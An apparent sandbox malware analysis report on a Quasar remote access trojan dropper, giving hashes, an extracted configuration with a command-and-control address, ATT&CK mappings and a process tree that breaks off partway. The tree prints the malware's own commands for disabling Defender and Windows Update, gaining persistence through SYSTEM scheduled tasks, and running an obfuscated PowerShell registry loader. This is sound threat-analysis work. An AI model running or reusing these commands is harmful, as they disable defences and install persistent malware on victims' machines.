quasar | 647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06

Analysis

max time kernel
150s
max time network
149s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
11/01/2025, 03:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe
Size

4.9MB
MD5

3b1bf937711e0b1f3b6e455d535cc4f0
SHA1

c13cd57da269a9c84f63787c87a2e503bb154ac7
SHA256

647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06
SHA512

2805b2e4f3fdce85dea17a355e559073db2bd00e4788d667a3cdf7cde9e77a459545a7494253fe0fc540cbc89c19e599b1616bd7a185cdd4000b01a6354e99f4
SSDEEP

98304:j3GvI7nzlAi52DH1Emy/+hpC7FBV0CCqXqoOONza/IIA2ZeN9zE1m7:j3GvuSiIDHbM+G7Ff0s5NoIIA2M9w1w

Score

10^/10

quasar 4drun defense_evasion discovery evasion execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

4Drun

185.148.3.216:4000

Mutex

c3557859-56ac-475e-b44d-e1b60c20d0d0

Attributes

encryption_key
B000736BEBDF08FC1B6696200651882CF57E43E7
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
3dfx Startup
subdirectory
SubDir

Signatures

Modifies security service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 3 IoCs

resource	yara_rule
behavioral1/files/0x0007000000019cba-26.dat	family_quasar
behavioral1/memory/2236-29-0x00000000012D0000-0x0000000001354000-memory.dmp	family_quasar
behavioral1/memory/2856-35-0x0000000000F10000-0x0000000000F94000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 2540 created 432	2540	powershell.EXE	5
PID 1076 created 432	1076	powershell.EXE	5

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2908	powershell.exe
2012	powershell.exe
2728	powershell.exe
580	powershell.exe
2748	powershell.exe
2760	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WAGDKRVZ\ImagePath = "C:\\ProgramData\\mxergolzfguk\\kaptsegthwf.exe"	services.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 6 IoCs

pid	Process
2876	Tbcelsmfm.exe
2844	lgigivedpdvfs.exe
2236	MLjvrefsd5vf1.exe
2856	Client.exe
1932	Bara.exe
2012	kaptsegthwf.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Setup.evtx	svchost.exe

Loads dropped DLL 6 IoCs

pid	Process
2628	647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe
2628	647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe
2628	647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe
2416	taskeng.exe
476	services.exe
476	services.exe

Power Settings 1 TTPs 18 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1788	powercfg.exe
2456	powercfg.exe
2540	powercfg.exe
1580	powercfg.exe
2088	powercfg.exe
1868	powercfg.exe
1784	powercfg.exe
2164	powercfg.exe
2592	powercfg.exe
1796	powercfg.exe
572	powercfg.exe
1088	powercfg.exe
1800	powercfg.exe
2404	powercfg.exe
1964	cmd.exe
3028	powercfg.exe
1780	cmd.exe
2156	powercfg.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	kaptsegthwf.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\MRT.exe	Tbcelsmfm.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\Tasks\Barac	svchost.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 2844 set thread context of 2372	2844	lgigivedpdvfs.exe	63
PID 2540 set thread context of 552	2540	powershell.EXE	73
PID 1076 set thread context of 2672	1076	powershell.EXE	74
PID 2876 set thread context of 2572	2876	Tbcelsmfm.exe	92
PID 2012 set thread context of 2352	2012	kaptsegthwf.exe	129
PID 2012 set thread context of 2168	2012	kaptsegthwf.exe	130
PID 2012 set thread context of 2908	2012	kaptsegthwf.exe	131
PID 1932 set thread context of 2432	1932	Bara.exe	150

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files\Cuis\bon\Bara.exe	lgigivedpdvfs.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	svchost.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2956	sc.exe
2996	sc.exe
2616	sc.exe
1660	sc.exe
3036	sc.exe
1808	sc.exe
632	sc.exe
2264	sc.exe
2588	sc.exe
2300	sc.exe
2828	sc.exe
2676	sc.exe
3032	sc.exe
2772	sc.exe
1528	sc.exe
2792	sc.exe
3008	sc.exe
2068	sc.exe
2356	sc.exe
2108	sc.exe
1052	sc.exe
1036	sc.exe
1924	sc.exe
2172	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
888	WMIC.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 007e83d9d963db01	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2792	schtasks.exe
2768	schtasks.exe
592	schtasks.exe
1652	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2876	Tbcelsmfm.exe
580	powershell.exe
2908	powershell.exe
1388	powershell.exe
2540	powershell.EXE
1076	powershell.EXE
2540	powershell.EXE
552	dllhost.exe
552	dllhost.exe
552	dllhost.exe
552	dllhost.exe
552	dllhost.exe
552	dllhost.exe
552	dllhost.exe
552	dllhost.exe
552	dllhost.exe
552	dllhost.exe
552	dllhost.exe
552	dllhost.exe
1076	powershell.EXE
2672	dllhost.exe
2672	dllhost.exe
2856	Client.exe
2672	dllhost.exe
2672	dllhost.exe
552	dllhost.exe
552	dllhost.exe
2672	dllhost.exe
2672	dllhost.exe
552	dllhost.exe
552	dllhost.exe
2672	dllhost.exe
2672	dllhost.exe
552	dllhost.exe
552	dllhost.exe
2672	dllhost.exe
2672	dllhost.exe
552	dllhost.exe
552	dllhost.exe
2672	dllhost.exe
2672	dllhost.exe
552	dllhost.exe
552	dllhost.exe
2856	Client.exe
2672	dllhost.exe
2672	dllhost.exe
552	dllhost.exe
552	dllhost.exe
2672	dllhost.exe
2672	dllhost.exe
552	dllhost.exe
552	dllhost.exe
2672	dllhost.exe
2672	dllhost.exe
552	dllhost.exe
552	dllhost.exe
2672	dllhost.exe
2672	dllhost.exe
552	dllhost.exe
552	dllhost.exe
2672	dllhost.exe
2672	dllhost.exe
552	dllhost.exe
552	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2236	MLjvrefsd5vf1.exe
Token: SeDebugPrivilege	2856	Client.exe
Token: SeDebugPrivilege	580	powershell.exe
Token: SeShutdownPrivilege	572	powercfg.exe
Token: SeShutdownPrivilege	1088	powercfg.exe
Token: SeShutdownPrivilege	1868	powercfg.exe
Token: SeDebugPrivilege	2908	powershell.exe
Token: SeShutdownPrivilege	3028	powercfg.exe
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	2540	powershell.EXE
Token: SeDebugPrivilege	1076	powershell.EXE
Token: SeDebugPrivilege	2540	powershell.EXE
Token: SeDebugPrivilege	552	dllhost.exe
Token: SeDebugPrivilege	1076	powershell.EXE
Token: SeDebugPrivilege	2672	dllhost.exe
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeAuditPrivilege	864	svchost.exe
Token: SeDebugPrivilege	2728	powershell.exe
Token: SeDebugPrivilege	2876	Tbcelsmfm.exe
Token: SeDebugPrivilege	2572	dialer.exe
Token: SeShutdownPrivilege	1800	powercfg.exe
Token: SeShutdownPrivilege	1784	powercfg.exe
Token: SeShutdownPrivilege	1788	powercfg.exe
Token: SeShutdownPrivilege	2456	powercfg.exe
Token: SeAuditPrivilege	864	svchost.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	2012	kaptsegthwf.exe
Token: SeShutdownPrivilege	1580	powercfg.exe
Token: SeShutdownPrivilege	2540	powercfg.exe
Token: SeShutdownPrivilege	2404	powercfg.exe
Token: SeDebugPrivilege	2352	dialer.exe
Token: SeShutdownPrivilege	2164	powercfg.exe
Token: SeLockMemoryPrivilege	2908	dialer.exe
Token: SeAssignPrimaryTokenPrivilege	864	svchost.exe
Token: SeIncreaseQuotaPrivilege	864	svchost.exe
Token: SeSecurityPrivilege	864	svchost.exe
Token: SeTakeOwnershipPrivilege	864	svchost.exe
Token: SeLoadDriverPrivilege	864	svchost.exe
Token: SeSystemtimePrivilege	864	svchost.exe
Token: SeBackupPrivilege	864	svchost.exe
Token: SeRestorePrivilege	864	svchost.exe
Token: SeShutdownPrivilege	864	svchost.exe
Token: SeSystemEnvironmentPrivilege	864	svchost.exe
Token: SeUndockPrivilege	864	svchost.exe
Token: SeManageVolumePrivilege	864	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	864	svchost.exe
Token: SeIncreaseQuotaPrivilege	864	svchost.exe
Token: SeSecurityPrivilege	864	svchost.exe
Token: SeTakeOwnershipPrivilege	864	svchost.exe
Token: SeLoadDriverPrivilege	864	svchost.exe
Token: SeSystemtimePrivilege	864	svchost.exe
Token: SeBackupPrivilege	864	svchost.exe
Token: SeRestorePrivilege	864	svchost.exe
Token: SeShutdownPrivilege	864	svchost.exe
Token: SeSystemEnvironmentPrivilege	864	svchost.exe
Token: SeUndockPrivilege	864	svchost.exe
Token: SeManageVolumePrivilege	864	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	864	svchost.exe
Token: SeIncreaseQuotaPrivilege	864	svchost.exe
Token: SeSecurityPrivilege	864	svchost.exe
Token: SeTakeOwnershipPrivilege	864	svchost.exe
Token: SeLoadDriverPrivilege	864	svchost.exe
Token: SeSystemtimePrivilege	864	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2856	Client.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2628 wrote to memory of 2876	2628	647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe	30
PID 2628 wrote to memory of 2876	2628	647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe	30
PID 2628 wrote to memory of 2876	2628	647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe	30
PID 2628 wrote to memory of 2844	2628	647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe	31
PID 2628 wrote to memory of 2844	2628	647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe	31
PID 2628 wrote to memory of 2844	2628	647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe	31
PID 2628 wrote to memory of 2236	2628	647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe	32
PID 2628 wrote to memory of 2236	2628	647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe	32
PID 2628 wrote to memory of 2236	2628	647fb95e4fbe4daaaff5dd81e69c2cef8c12d8f5a6f7c95d88f67de72e542b06.exe	32
PID 2236 wrote to memory of 2792	2236	MLjvrefsd5vf1.exe	33
PID 2236 wrote to memory of 2792	2236	MLjvrefsd5vf1.exe	33
PID 2236 wrote to memory of 2792	2236	MLjvrefsd5vf1.exe	33
PID 2236 wrote to memory of 2856	2236	MLjvrefsd5vf1.exe	35
PID 2236 wrote to memory of 2856	2236	MLjvrefsd5vf1.exe	35
PID 2236 wrote to memory of 2856	2236	MLjvrefsd5vf1.exe	35
PID 2856 wrote to memory of 2768	2856	Client.exe	36
PID 2856 wrote to memory of 2768	2856	Client.exe	36
PID 2856 wrote to memory of 2768	2856	Client.exe	36
PID 2844 wrote to memory of 580	2844	lgigivedpdvfs.exe	40
PID 2844 wrote to memory of 580	2844	lgigivedpdvfs.exe	40
PID 2844 wrote to memory of 580	2844	lgigivedpdvfs.exe	40
PID 2844 wrote to memory of 3000	2844	lgigivedpdvfs.exe	42
PID 2844 wrote to memory of 3000	2844	lgigivedpdvfs.exe	42
PID 2844 wrote to memory of 3000	2844	lgigivedpdvfs.exe	42
PID 2844 wrote to memory of 1964	2844	lgigivedpdvfs.exe	43
PID 2844 wrote to memory of 1964	2844	lgigivedpdvfs.exe	43
PID 2844 wrote to memory of 1964	2844	lgigivedpdvfs.exe	43
PID 2844 wrote to memory of 2908	2844	lgigivedpdvfs.exe	44
PID 2844 wrote to memory of 2908	2844	lgigivedpdvfs.exe	44
PID 2844 wrote to memory of 2908	2844	lgigivedpdvfs.exe	44
PID 1964 wrote to memory of 572	1964	cmd.exe	48
PID 1964 wrote to memory of 572	1964	cmd.exe	48
PID 1964 wrote to memory of 572	1964	cmd.exe	48
PID 3000 wrote to memory of 2676	3000	cmd.exe	49
PID 3000 wrote to memory of 2676	3000	cmd.exe	49
PID 3000 wrote to memory of 2676	3000	cmd.exe	49
PID 3000 wrote to memory of 2956	3000	cmd.exe	50
PID 3000 wrote to memory of 2956	3000	cmd.exe	50
PID 3000 wrote to memory of 2956	3000	cmd.exe	50
PID 3000 wrote to memory of 2996	3000	cmd.exe	51
PID 3000 wrote to memory of 2996	3000	cmd.exe	51
PID 3000 wrote to memory of 2996	3000	cmd.exe	51
PID 1964 wrote to memory of 1088	1964	cmd.exe	52
PID 1964 wrote to memory of 1088	1964	cmd.exe	52
PID 1964 wrote to memory of 1088	1964	cmd.exe	52
PID 1964 wrote to memory of 1868	1964	cmd.exe	53
PID 1964 wrote to memory of 1868	1964	cmd.exe	53
PID 1964 wrote to memory of 1868	1964	cmd.exe	53
PID 3000 wrote to memory of 3036	3000	cmd.exe	54
PID 3000 wrote to memory of 3036	3000	cmd.exe	54
PID 3000 wrote to memory of 3036	3000	cmd.exe	54
PID 1964 wrote to memory of 3028	1964	cmd.exe	55
PID 1964 wrote to memory of 3028	1964	cmd.exe	55
PID 1964 wrote to memory of 3028	1964	cmd.exe	55
PID 3000 wrote to memory of 3032	3000	cmd.exe	56
PID 3000 wrote to memory of 3032	3000	cmd.exe	56
PID 3000 wrote to memory of 3032	3000	cmd.exe	56
PID 3000 wrote to memory of 2356	3000	cmd.exe	57
PID 3000 wrote to memory of 2356	3000	cmd.exe	57
PID 3000 wrote to memory of 2356	3000	cmd.exe	57
PID 3000 wrote to memory of 2344	3000	cmd.exe	58
PID 3000 wrote to memory of 2344	3000	cmd.exe	58
PID 3000 wrote to memory of 2344	3000	cmd.exe	58
PID 2908 wrote to memory of 592	2908	powershell.exe	59

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:432
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4bdcf8c1-1223-4951-83d1-50c71d08bfc4}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:552
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{b8ef8e8d-20a8-4338-95c5-5f4d624328ac}
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2672

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Sets service image path in registry
- Loads dropped DLL
PID:476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:596
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:1716
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:324
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    - Checks processor information in registry
    PID:344
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:672
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  - Indicator Removal: Clear Windows Event Logs
  PID:748
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:820
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1164
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:864
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {1D7AD793-0108-4937-970A-1DFE3AB270C4} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Loads dropped DLL
    PID:2416
  - - C:\Program Files\Cuis\bon\Bara.exe
      "C:\Program Files\Cuis\bon\Bara.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:1932
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:2760
    - - C:\Windows\system32\cmd.exe
        
        cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:2252
      - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:2828
      - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:2792
      - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:632
      - C:\Windows\system32\sc.exe
        
        sc stop bits
        6⤵
        Launches sc.exe
        
        PID:3008
      - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        6⤵
        Launches sc.exe
        
        PID:2108
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        6⤵
        
        PID:680
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        6⤵
        
        PID:2484
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        6⤵
        
        PID:836
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        6⤵
        
        PID:1572
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        6⤵
        
        PID:2608
    - - C:\Windows\system32\cmd.exe
        
        cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:1780
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        
        PID:2156
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        
        PID:2592
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:1796
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:2088
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:2012
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Barac /tr "'C:\Program Files\Cuis\bon\Bara.exe'"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1652
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe ujznpffbjbh
        5⤵
        
        PID:2432
      - C:\Windows\system32\cmd.exe
        
        cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        6⤵
        Drops file in Program Files directory
        
        PID:584
    - - C:\Windows\system32\cmd.exe
        
        cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        5⤵
        Drops file in Program Files directory
        
        PID:2660
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Name, VideoProcessor
        6⤵
        Detects videocard installed
        Modifies data under HKEY_USERS
        
        PID:888
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2540
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
